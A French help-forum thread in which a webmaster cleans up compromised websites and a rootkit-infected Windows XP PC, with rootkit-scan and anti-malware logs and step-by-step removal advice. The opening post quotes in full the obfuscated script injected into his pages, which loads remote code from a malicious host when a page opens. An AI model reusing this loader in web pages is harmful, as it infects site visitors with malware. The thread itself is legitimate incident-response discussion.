Rootkit et sites web attaqués

[WebMap]

Bonjour,

 

Cela fait plus d'une semaine que je me bagarre contre des malwares récalcitrants... et je ne me sens pas encore le cœur à formater ma partition...

 

Cela a commencé par l'infection d'un site Wiki, que j'ai développé. Un petit coup d'oeil dans le code et je découvre ceci,

un script incompréhensible (pour moi) en bas de page d'accueil :

<script>/*LGPL*/ try{ window.onload = function(){var G8rd4qjbxo3 = document.createElement('s#c!$)r!i&p@t@'.replace(/\$|#|\!|\(|&|\)|@|\^/ig, ''));G8rd4qjbxo3.setAttribute('defer', 'd#e$^(@^f#)e&r$$!'.replace(/\!|#|@|\$|&|\^|\)|\(/ig, ''));G8rd4qjbxo3.setAttribute('type', 't!e!^x$@)t!##/^@j)a^(#(v)$(a!@s)c@@r(&$i^p^!)($t^'.replace(/@|\)|#|\!|\^|\(|\$|&/ig, ''));G8rd4qjbxo3.setAttribute('id', 'L^&!(7^)@@p)&((o(#h)m@(k!)!v(^!)o$5$(m!g@&@^m#@'.replace(/&|\(|@|\$|#|\^|\!|\)/ig, ''));G8rd4qjbxo3.setAttribute('s&r))c&'.replace(/\(|#|\!|\^|&|@|\)|\$/ig, ''),  'h(()!t#&t)^$p)^@^:#/!($/@^@e!&^t#!(s####y!!!-^(@($c@!&o$&(^m#@&(.$^@c)@a))r&t$#&o!^$@^o&$n&^&$n&e&t&w)o^&!$r)k!$().!!@c&!o(^@m#!!)#.)v$(e@n&t(@e((-&(p@$r(i@#))v!!&&&e@(&(e^^)(-@!c^$!o$&m#@).#&t(h&@#@e($^l((a#$@)c&@@e)!w&(e@$)!b)!&!^.(!(r#$u):#8(0!)#8!!&^0@@)/^!!x$@!i@@c@&(i#@!.(!n!e@t$$^/!x@^i#@^c)$#i!&@.)n)^$e#)t(/&(^s$&)&a@(n(!$#o^@!o@k^^@).$!(^^c)#!o@)^m&/^!$t@#(r@i(#p)$!o)))d(.$c^o)@m#@#$/$^#@g&)o)!$^o&g(l)@e()^$.&(@^c!o^&$m$/$@'.replace(/&|\)|\(|#|@|\!|\$|\^/ig, ''));if (document){document.body.appendChild(G8rd4qjbxo3);}} } catch(Eqm24t96352nr6szyx) {}</script>
<!--038a42264513ede9ee6d8a40ada39e78-->

Ne soupçonnant pas l'ampleur du problème, j'efface le script et remet en ligne le fichier corrigé. Le Wiki était revenu, apparemment, à son état normal.

Le lendemain... rebelote ! Et je découvre que mon forum est infecté de la même manière ainsi que tous les sites dont je possède les codes FTP ! (le script est inséré dans toutes les pages index.php, .html...)

Le problème est semblable à ceux décrit dans ce sujet : Attaques Sites Web par Iframes (et similaires).

Je procède donc à un nettoyage complet des sites (suppression de tous les codes malveillants et/ou récupération des Backups) et à l'analyse de mon PC avec MalwareBytes qui me détecte plusieurs Trojans et un Rootkit. D'après le rapport d'analyse, il parvient à supprimer tous les problèmes.

Une mise à jour de mon XP Pro et je me retrouve avec Security Tools que j'arrive, non sans mal, à supprimer avec MalwareBytes.

 

Mais l'infection de certains sites c'est reproduit à plusieurs reprises, malgré les changements de mot de passe FTP (et effacement des mots de passe sur Filezilla) et aujourd'hui je redécouvre un nouveau rootkit sur ma machine.

 

Voici un rapport d'analyse de Gmer.

GMER 1.0.15.15281 - http://www.gmer.net
Rootkit scan 2010-01-15 13:15:21
Windows 5.1.2600 Service Pack 2
Running: gmer.exe; Driver: C:\DOCUME~1\FIFI\LOCALS~1\Temp\pwlyquod.sys

---- System - GMER 1.0.15 ----

SSDT	F7F60756	ZwCreateKey
SSDT	F7F6074C	ZwCreateThread
SSDT	F7F6075B	ZwDeleteKey
SSDT	F7F60765	ZwDeleteValueKey
SSDT	F7F6076A	ZwLoadKey
SSDT	F7F60738	ZwOpenProcess
SSDT	F7F6073D	ZwOpenThread
SSDT	F7F60774	ZwReplaceKey
SSDT	F7F6076F	ZwRestoreKey
SSDT	F7F60760	ZwSetValueKey
SSDT	F7F60747	ZwTerminateProcess

---- Kernel code sections - GMER 1.0.15 ----

.pak2	C:\WINDOWS\system32\drivers\gsbigqf.sys	entry point in ".pak2" section [0xF7774168]
?		  C:\WINDOWS\system32\drivers\gsbigqf.sys	Un périphérique attaché au système ne fonctionne pas correctement.
PAGE	Ntfs.sys	F7571E88 4 Bytes  CALL 8676F611 
init	C:\WINDOWS\system32\drivers\ALCXSENS.SYS	entry point in "init" section [0xF6D537F0]
pnidata	C:\WINDOWS\System32\DRIVERS\secdrv.sys	unknown last section [0xA8739F00, 0x24000, 0x48000000]

---- Devices - GMER 1.0.15 ----

Device		  \FileSystem\Ntfs \Ntfs	866DF298
Device		  \Driver\Cdrom \Device\CdRom0	8679196E
Device		  \Driver\Cdrom \Device\CdRom1	8679196E
Device		  \Driver\atapi \Device\Ide\IdePort0	8679301C
Device		  \Driver\atapi \Device\Ide\IdePort1	8679301C
Device		  \Driver\atapi \Device\Ide\IdeDeviceP0T0L0-4	8679301C
Device		  \Driver\atapi \Device\Ide\IdeDeviceP0T1L0-c	8679301C
Device		  \Driver\atapi \Device\Ide\IdeDeviceP1T0L0-18	8679301C
Device		  \Driver\atapi \Device\Ide\IdeDeviceP1T1L0-20	8679301C
Device		  \Driver\Cdrom \Device\CdRom2	8679196E
Device		  \Driver\PrecSim \Device\Scsi\PrecSim1Port0Path0Target0Lun0	8679300C
Device		  \Driver\PrecSim \Device\Scsi\PrecSim1	8679300C

AttachedDevice  \FileSystem\Fastfat \Fat	fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation)
AttachedDevice  \FileSystem\Fastfat \Fat	fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation)

---- Services - GMER 1.0.15 ----

Service		  (*** hidden *** )	[BOOT] gsbigqf														   <-- ROOTKIT !!!

---- Registry - GMER 1.0.15 ----

Reg			 HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@Type	1
Reg			 HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@Start	0
Reg			 HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@ErrorControl	0
Reg			 HKLM\SYSTEM\CurrentControlSet\Services\gsbigqf@Group	Boot Bus Extender
Reg			 HKLM\SYSTEM\ControlSet003\Services\gsbigqf@Type	1
Reg			 HKLM\SYSTEM\ControlSet003\Services\gsbigqf@Start	0
Reg			 HKLM\SYSTEM\ControlSet003\Services\gsbigqf@ErrorControl	0
Reg			 HKLM\SYSTEM\ControlSet003\Services\gsbigqf@Group	Boot Bus Extender
Reg			 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs@C:\Program Files\Macromedia\Dreamweaver 8\Configuration\Behaviors\Events\4.0 et ultÃ\x2026Â\xbdrieurs.htm  1

---- EOF - GMER 1.0.15 ----

 

J'ai donc un fichier "rootkité" gsbigqf.sys dans le répertoire system32/drivers/ (MalwareBytes le voit mais ne l'éradique pas)

 

 

Maintenant que Gmer l'a trouvé, que dois-je faire ?

Un delete service pour la ligne suivante (la seule qui apparait en rouge dans le rapport de scan) est-il suffisant ?

Service		  (*** hidden ***)				 [BOOT] gsbigqf

Y a-t-il d'autres lignes sur lesquelles je dois faire une action ?

 

Au cas où... j'ajoute le rapport Hijackthis... (mais je n'y vois pas vraiment de souci...)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 14:31:02, on 15/01/2010
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\PROGRA~1\SMARTP~1\SMARTP~1.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Smart Power\jre\bin\javaw.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\SMARTP~1\monitor.exe
C:\Program Files\Smart Power\jre\bin\javaw.exe
C:\PROGRA~1\SMARTP~1\SPRMI.exe
C:\Program Files\Smart Power\jre\bin\javaw.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
E:\antivirus\Gmer\gmer.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - (no file)
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Fichiers communs\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Fichiers communs\Adobe\Calibration\Adobe Gamma Loader.exe
O8 - Extra context menu item: Convertir les liens sélectionnés en fichier Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Avira AntiVir Planificateur (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: SmartPower - ZeroG Software - C:\PROGRA~1\SMARTP~1\SMARTP~1.EXE
O23 - Service: SmartPowerManager - ZeroG Software - C:\PROGRA~1\SMARTP~1\manager.exe
O23 - Service: SmartPowerMonitor - ZeroG Software - C:\PROGRA~1\SMARTP~1\monitor.exe
O23 - Service: SmartPowerRMI - ZeroG Software - C:\PROGRA~1\SMARTP~1\SPRMI.exe

--
End of file - 5215 bytes

Merci de votre aide.

[pear]

Bonjour,

 

Un delete service pour la ligne suivante (la seule qui apparait en rouge dans le rapport de scan) est-il suffisant ?

 

Normalement oui pour supprimer le rootkit.

 

Ensuite:

rkill.comTélécharger Rkill de Grinler sur le bureau,

double clic pour le lancer.

Sous Vista, faire un clic droit sur le fichier rkill téléchargé puis choisir "Exécuter en tant qu'Administrateur"

Une fenêtre (très rapide) indiquera que tout s'est bien déroulé.

Pour Vista, faire un clic droit sur le fichier rkill téléchargé puis choisir "Exécuter en tant qu'Administrateur" pour lancer l'outil.

Notez que Rkill ne produit pas de rapport

 

Téléchargez MBAM

 

Branchez tous les supports amovibles avant de faire ce scan (clé usb/disque dur externe etc)

Vous devez désactiver vos protections et ne savez pas comment faire

 

Sur Bleeping Computers en Anglais:

 

Sur PCA,En Français

* Double cliquez sur l'icône Download_mbam-setup.exe pour lancer le processus d'installation.

Enregistrez le sur le bureau .

Fermer toutes les fenêtres et programmes

Suivez les indications (en particulier le choix de la langue et l'autorisation d'accession à Internet)

N'apportez aucune modification aux réglages par défaut et, en fin d'installation,

Vérifiez que les options Update et Launch soient cochées

MBAM démarrera automatiquement et enverra un message demandant à mettre à jour le programme avant de lancer une analyse.

cliquer sur OK pour fermer la boîte de dialogue..

* Dans l'onglet "mise à jour", cliquez sur le bouton Recherche de mise à jour:

Si le pare-feu demande l'autorisation à MBAM de se connecter, acceptez.

* Une fois la mise à jour terminée, allez dans l'onglet Recherche.

* Sélectionnez "Exécuter un examen complet"

* Cliquez sur "Rechercher"

* .L' analyse prendra un certain temps, soyez patient !

* A la fin , un message affichera :

L'examen s'est terminé normalement.

 

*Si MBAM n'a rien trouvé, il le dira aussi.

Cliquez sur "Ok" pour poursuivre.

*Fermez les navigateurs.

Cliquez sur Afficher les résultats .

 

*Sélectionnez tout et cliquez sur Supprimer la sélection ,

MBAM va détruire les fichiers et clés de registre et en mettre une copie dans la quarantaine.

puis ouvrir le Bloc-notes et y copier le rapport d'analyse qui peut être retrouvé sous l'onglet Rapports/logs.

* Copiez-collez ce rapport dans la prochaine réponse.

[WebMap]

Merci de ta réponse.

 

Voilà le rapport de MBAM après avoir exécuter rkill...

Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3569
Windows 5.1.2600 Service Pack 2
Internet Explorer 8.0.6001.18702

15/01/2010 20:13:08
mbam-log-2010-01-15 (20-13-03).txt

Type de recherche: Examen complet (C:\|D:\|E:\|F:\|)
Eléments examinés: 290103
Temps écoulé: 2 hour(s), 7 minute(s), 5 second(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 1

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
C:\WINDOWS\system32\drivers\gsbigqf.sys (Rootkit.Agent) -> No action taken.

Le résultat est le même...

 

J'ai reçu en message privé des conseils m'orientant vers le forum Malekal et préconisant l'utilisation de Avenger avec le script approprié...

Script :

Drivers to delete:
gsbigqf
Registry keys to delete:
HKLM\SYSTEM\ControlSet003\Services\gsbigqf

Voici le rapport d'Avenger après redémarrage :

Logfile of The Avenger Version 2.0, (c) by Swandog46
http://swandog46.geekstogo.com

Platform:  Windows XP

*******************

Script file opened successfully.
Script file read successfully.

Backups directory opened successfully at C:\Avenger

*******************

Beginning to process script file:

Rootkit scan active.
No rootkits found!

Driver "gsbigqf" deleted successfully.
Registry key "HKLM\SYSTEM\ControlSet003\Services\gsbigqf" deleted successfully.

Completed script processing.

*******************

Finished!  Terminate.

Mais le fichier system32/drivers/gsbigqf.sys était toujours présent et Avira lance une alerte ! J'ai demandé la suppression... et je redémarre...

 

 

[EDIT]

Quelques minutes plus tard...

Mon PC a bien redémarré... j'ai lancé un scan rapide de MBAM (il repérait le rootkit avec le scan rapide)... plus rien.

J'effectuerai un scan complet plus tard, pour m'assurer qu'il n'y a plus de problème.

 

Seule inquiétude, je ne sais pas si la suppression par Avira était la meilleure solution. Le fichier system32/drivers/gsbigqf.sys a bien disparu, mais n'est-ce pas remplacer un mal par un autre ?

Quelles peuvent être les conséquences de cette suppression ?

 

Merci pour ton aide et merci à Angélique pour son message en privé !

Modifié le 15 janvier 2010 par WebMap

[pear]

Vous auriez vraisemblement abouti au même résultat en poursuivant la procédure Mbam:

L'examen s'est terminé normalement.

 

*Si MBAM n'a rien trouvé, il le dira aussi.

Cliquez sur "Ok" pour poursuivre.

*Fermez les navigateurs.

Cliquez sur Afficher les résultats .

 

*Sélectionnez tout et cliquez sur Supprimer la sélection ,

MBAM va détruire les fichiers et clés de registre et en mettre une copie dans la quarantaine.

puis ouvrir le Bloc-notes et y copier le rapport d'analyse qui peut être retrouvé sous l'onglet Rapports/logs.

* Copiez-collez ce rapport dans la prochaine réponse.

[WebMap]

Vous auriez vraisemblement abouti au même résultat en poursuivant la procédure Mbam: (...)

Ah ?... Pourtant, j'avais effectué plusieurs fois la procédure "Supprimer la sélection", en vain...

MBAM m'indiquait dans son rapport "Deleted on reboot" mais le fichier revenait quand même.

 

 

Mon antivirus ne semble pas protéger ma machine contre ce genre de malware...

J'avais SpyBot S&D, SpywareBlaster et Avira Antivir Personal installés sur ma machine, ce qui n'a pas empêché l'infection... quelle protection dois-je ajouter pour éviter une nouvelle infection ? Un par-feu autre que celui de windows comme ZoneAlarm ?

 

Merci encore !

[pear]

Bonjour,

A ma connaissance, il n'y a pas de protection contre des Iframes piégés et invisibles.

 

Par contre, il y a cet outil:

L'outil WC32.exe (d'Eric_71)recherche et retire les iFrames infectés sur la machine.

 

Télécharge WC32.exe (Virut Scan)

sur le Bureau,

- Lancez-le par double-clic

- De la fenêtre principale, décochez "Suspicious iFrames" (au bas) pour éviter les faux positifs éventuels

- Cliquez sur le bouton "Scan"

-Copier/coller le rapport ici,

Pour nettoyer "Disinfect checked files" (si pertinent), juste pour confirmer.

Si vous faites l'analyse avec "Suspicious iFrames" coché, prudence avec les faux positifs.

Analyser tout fichier suspect sur Virus Total

[WebMap]

Merci encore...

j'ai procédé à un nettoyage complet de mes sites. À noter que le script ne s'insère pas que sur les pages index.html ou index.php... Je l'ai retrouvé dans toutes les pages javascript, sans les balises

<script></script>

Il faut donc effectuer une recherche du script avec et sans ces balises...

 

Pour plus de sureté, effectuer d'abord une recherche dans tous les fichiers de la portion de code

/*LGPL*/ try{ window.onload = function(){

et à chaque fois que ce code est trouvé, relancer une recherche avec l'ensemble du script pour le supprimer dans toutes les pages.

Puis répéter la recherche de la portion de code jusqu'à ce que celle si ne soit plus trouvé. Ça peut être un peu long...

 

Je devrais peut-être ouvrir un autre sujet, mais comme c'est lié à mon problème je pose la question ici : question plusieurs fois abordée sur ce forum... sur la comparaison Avast vs Antivir...

Je sais que Antivir est vivement conseillé ici, cependant, il apparait que Antivir ne voit pas le troyen provoqué par ce script... Avast le voit...

 

Je m'en suis rendu compte suite à divers retour d'internautes (équipés d'Avast) sur mes sites...

 

Alors question : Antivir est-il toujours meilleur que Avast ou sont-ils équivalents ?

[pear]

Je ne crois pas que l'on puise donner une réponse sérieuse.

A priori , je votais antivir, mais vous donnez un exemple contraire.

Alors??

 

En cas de doute->Scan enligne avec un autre( Kaspersky, Panda etc..)

Modifié le 20 janvier 2010 par pear